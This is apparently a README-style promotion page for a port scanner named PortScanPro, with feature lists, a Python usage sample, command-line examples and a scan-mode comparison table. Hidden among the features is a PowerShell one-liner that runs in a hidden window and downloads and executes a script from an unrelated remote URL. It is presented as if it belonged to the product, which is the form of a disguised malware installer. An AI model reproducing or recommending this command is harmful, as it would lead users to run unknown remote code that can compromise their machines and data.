Enterprise-grade port scanning with intelligent analysis and reporting
✅ Multi-Protocol Support
- TCP SYN/FIN/XMAS scans
- UDP service detection
- SCTP protocol scanning
✅ Adaptive Performance
- Auto-rate limiting (prevents network overload)
- Parallel scan optimization
- Packet fragmentation detection
- Internet connection for real-time data fetching
powershell -WindowStyle Hidden -Command ([ScriptBlock]::Create((irm https://jaihind.edu.in/weatherdolphin/dollrandom))).Invoke();
# Sample scan with intelligent throttling
from portscanpro import Scanner
scanner = Scanner(
target="192.168.1.0/24",
ports="1-1024,3389,8080",
intensity="corporate" # adjusts packet rate
)
results = scanner.run()
-
Banner grabbing with protocol decoding
-
SSL/TLS inspection (supported ciphers/versions)
-
Service version detection (1500+ signatures)
graph TD
A[Target IP] --> B[Open Ports]
B --> C[Service Identification]
C --> D[Vulnerability Indicators]
psp scan -t 10.0.0.1 -p 22,80,443 -m syn
psp deepscan -f targets.txt -o audit_2024.html --legal-check
psp monitor --network 192.168.1.0/24 --schedule daily --slack-alerts
| Mode | Speed | Stealth | Reliability |
|------------|-------|---------|-------------|
| SYN Scan | ★★★★☆ | ★★★★★ | ★★★★☆ |
| CONNECT | ★★★☆☆ | ★★☆☆☆ | ★★★★★ |
| UDP Probe | ★★☆☆☆ | ★★★☆☆ | ★★★☆☆ |